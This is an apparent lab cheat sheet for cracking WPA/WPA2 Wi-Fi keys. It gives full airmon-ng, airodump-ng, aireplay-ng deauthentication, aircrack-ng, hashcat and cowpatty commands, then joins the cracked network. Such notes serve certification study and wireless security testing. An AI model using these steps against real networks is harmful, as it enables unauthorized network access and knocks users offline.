WPA/WPA2
Last updated
Last updated
Steps to crack the WPA/WPA2 key. We will need a WPA handshake.
First of all check and kill with airmon-ng:
sudo airmon-ng check
sudo airmon-ng check killNext, we enable monitor mode:
sudo airmon-ng start wlan0
sudo airmon-ng start wlan0 <channel_id>
# scan 5ghz networks
sudo airodump-ng -b a wlan0We will now find the bssid (MAC) and essid (SSID) of our target:
sudo airodump-ng wlan0Example output:
We found our target F0:A7:31:46:69:71 and see its using WPA2 PSK auth. We can also see its on channel 1.
sudo airodump-ng -c 1 -w wpa2 --bssid F0:A7:31:46:69:71 wlan0-c | channel to 1
-w for write output as wpa2
--bssid for target MAC
wlan 0 our monitor interface
We will now have to wait for a client to connect to the network or inject using a deauthorization attack. We can see one station (client) is connected 8C:EC:7B:0F:63:24.
We use ‘aireplay-ng’ which is an injection attack. This forces a re-authentication packet into the wire.
┌──(kali㉿kali)-[~/offsec/oswp]
└─$ sudo aireplay-ng -0 1 -a F0:A7:31:46:69:71 -c 8C:EC:7B:0F:63:24 wlan0
13:38:20 Waiting for beacon frame (BSSID: F0:A7:31:46:69:71) on channel 1
13:38:21 Sending 64 directed DeAuth (code 7). STMAC: [8C:EC:7B:0F:63:24] [ 0| 0 ACKs]After that we can see "WPA handshake: X" status:
We now have captured a handshake in the .cap file. We can now use aircrack to crack the PSK.
Now we will run ‘aircrack-ng’ against the dump file we gathered earlier.
aircrack-ng -w list.txt -e OSWP -b F0:A7:31:46:69:71 wpa2-01.cap
Convert cap to hashcat hash mode 22000
hcxpcapngtool -o hash.hc22000 -E wordlist wpa2-01.capCrack it
hashcat -m 22000 hash.hc22000 list.txtWith cowpatty
First generate list of hashes:
genpmk -f list.txt -d oswphashes -s OSWPThen crack it:
cowpatty -r wpa2-01.cap -d oswphashes -s OSWPnetwork={
ssid="wifi-mobile"
psk="$PASSWORD"
scan_ssid=1
key_mgmt=WPA-PSK
proto=WPA2
}Then connect to wlan3 interface
wpa_supplicant -Dnl80211 -iwlan3 -c psk.confAnd get DHCP IP:
dhclient wlan3 -v